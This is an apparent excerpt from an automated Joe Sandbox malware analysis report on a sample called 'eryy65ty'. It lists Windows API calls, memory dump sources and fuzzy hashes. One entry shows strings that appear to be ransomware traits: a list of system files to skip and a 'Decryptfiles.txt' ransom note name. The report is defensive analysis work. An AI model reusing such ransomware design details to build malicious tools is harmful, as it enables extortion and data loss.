                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Alloc
                                                                                                      • String ID: FlsAlloc$`F
                                                                                                      • API String ID: 2773662609-3049364600
                                                                                                      • Opcode ID: 126870634740c4b0c0111c34d0fc9ce4906afc9ad723fbce0771e124f69ef835
                                                                                                      • Instruction ID: 6c40cd3109a2e5d9aee1cca638713dfa91453d35cd9e4084ea8a1508fd9c0d07
                                                                                                      • Opcode Fuzzy Hash: 126870634740c4b0c0111c34d0fc9ce4906afc9ad723fbce0771e124f69ef835
                                                                                                      • Instruction Fuzzy Hash: 9AE0553068230CAFC2006B918D17F6FBB98DB8DB10F000219FC0A3B290CBF1AE0186A4
                                                                                                      APIs
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00E9CCEE), ref: 00EA4D75
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$FileSystem
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$`F
                                                                                                      • API String ID: 2086374402-755341324
                                                                                                      • Opcode ID: dc1d157438ca0d67fe238de34e3952f5e56967448697740d02bce1539eef7fdb
                                                                                                      • Instruction ID: 1048020afcf01e4e1e01439f07425189485cf5084c31de0f3e85a9c3abafc4ba
                                                                                                      • Opcode Fuzzy Hash: dc1d157438ca0d67fe238de34e3952f5e56967448697740d02bce1539eef7fdb
                                                                                                      • Instruction Fuzzy Hash: 61E0E571A82228BB86006B659D53E7FBB90DF99B01F05115DF8097B2D0DFA15E0096D1
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E3ADE0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00E8D498,?,?,?,00E31513), ref: 00E3ADE5
                                                                                                        • Part of subcall function 00E3ADE0: GetLastError.KERNEL32(?,?,?,00E31513), ref: 00E3ADEF
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00E31513), ref: 00E8D49C
                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E31513), ref: 00E8D4AB
                                                                                                      Strings
                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E8D4A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                      • API String ID: 3511171328-631824599
                                                                                                      • Opcode ID: 40dc63f81550a37ba56f9c872d0d13ea5e012f033d96dd2926e96a6af35345f0
                                                                                                      • Instruction ID: e8da2e763fca05ce4e64765f5bade574c70e1fa98b1ae50aeefc12b1416038c1
                                                                                                      • Opcode Fuzzy Hash: 40dc63f81550a37ba56f9c872d0d13ea5e012f033d96dd2926e96a6af35345f0
                                                                                                      • Instruction Fuzzy Hash: 96E06D702087508FC360AF69E988B437BE4AB14344F04991DE4AAF6791E7B5E488CBA1
                                                                                                      APIs
                                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00E8BE82,00E38EA1,?,?,?,00E8BEB7,00E7853D,?,?,?,?,?,00E8C94E,00E7853D,00000001), ref: 00E8D169
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00E38EA1,?,?,00E8BE82,00E38EA1,?,?,?,00E8BEB7,00E7853D,?,?,?,?,?,00E8C94E), ref: 00E8D16D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$FileSystem$Precise
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 743729956-2505862506
                                                                                                      • Opcode ID: 22db489a005263798c70768aebe1c80d2d367817858151f58293414f2dad0ff3
                                                                                                      • Instruction ID: d4ddd9a0e7c35ab7b10225477e772ff3bc039572712ce3ce558eecb55a5caa8f
                                                                                                      • Opcode Fuzzy Hash: 22db489a005263798c70768aebe1c80d2d367817858151f58293414f2dad0ff3
                                                                                                      • Instruction Fuzzy Hash: 65D0C93255A5289FCA012B96AC089AFBB18AF49B617044115E90DBB1718BA158049BD5
                                                                                                      APIs
                                                                                                      • TlsGetValue.KERNEL32(AB1AAB9C,00000000,?,?,?,?,?,7G,?,?,?,?,?,boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt,0000005F), ref: 00E4DA49
                                                                                                      • TlsGetValue.KERNEL32(00E4DDB0), ref: 00E4DADF
                                                                                                      • EnterCriticalSection.KERNEL32(?,00E4DDB0), ref: 00E4DB0C
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00E4DDB0), ref: 00E4DB6D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionValue$EnterLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1034430168-0
                                                                                                      • Opcode ID: c28ae9631136a2b0f4c7ffb1b10be2621a0794bf77ef74c736cc3dcf02429025
                                                                                                      • Instruction ID: 1c6423c7bf274517fa52331b8418638c0012b72bfbb5feba873eabf0a1ba7f24
                                                                                                      • Opcode Fuzzy Hash: c28ae9631136a2b0f4c7ffb1b10be2621a0794bf77ef74c736cc3dcf02429025
                                                                                                      • Instruction Fuzzy Hash: 07518BB0A08345DFDB11CF65E844BAABBF4FF04314F0581A9E455AB391D7B5E908CBA1